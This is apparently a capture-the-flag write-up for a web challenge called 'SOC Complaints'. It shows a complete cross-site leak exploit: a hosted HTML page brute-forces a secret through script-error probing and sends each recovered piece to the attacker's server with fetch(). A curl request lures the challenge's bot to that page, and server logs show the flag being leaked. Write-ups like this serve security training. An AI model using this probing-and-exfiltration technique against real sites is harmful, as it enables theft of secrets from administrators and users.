SOC Complaints

IPAddress 172.20.0.4 Port 80 URL http://172.20.0.4/

Description

If you cannot access a website, complain to the SOC team then the SOC team will investigate.

Structure

.
├── app.js
├── config
│   └── cors.js
├── controllers
│   ├── complaints.js
│   └── manage.js
├── middlewares
│   └── error.js
├── package.json
├── routes
│   ├── complaints.js
│   └── manage.js
├── utils
│   ├── browser.js
│   └── database.js
└── views

Solution

Exploit

Attacker IPAddress

ip addr show docker0
6: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:40:01:c8:b5 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:40ff:fe01:c8b5/64 scope link 
       valid_lft forever preferred_lft forever

IPv4: 172.17.0.1

Start a webserver on docker interface via python

python3 -m http.server 80 -b 172.17.0.1

Content of index.html

<html>
    <head>
        <title>EXPLOIT</title>
    </head>
    <body>
        <script>
            var alphabets = ' !"#$&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^`{|}~';
            var counter = 0;
            var secret = '';

            probeError = (url) => {
                let script = document.createElement('script');
                script.src = url;
                script.onload = async () => { 
                    secret = decodeURIComponent(url.split('?')[1].split('&')[1].split('=')[1]);
                    await fetch(`http://172.17.0.1/${secret}`);
                    counter = 0;
                    
                    probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);
                };
                script.onerror = () => {
                    counter = counter + 1;
                    probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);
                };
                document.head.appendChild(script);
            }
            probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);

        </script>
    </body>
</html>

Phish the SOC team

curl -X POST -H 'Content-type: application/json' -d '{"url": "http://172.17.0.1/"}' http://172.20.0.4/api/v1/complaints/
{"message":"your request was successfully submitted"}

Flag

└─$ python3 -m http.server 80 -b 172.17.0.1
Serving HTTP on 172.17.0.1 port 80 (http://172.17.0.1:80/) ...
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET / HTTP/1.1" 200 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /T HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TCC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TCC%7B HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T-E HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T-EN HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENO HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOU HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUG HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUGH HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUGH%7D HTTP/1.1" 404 -

Explanation

Last updated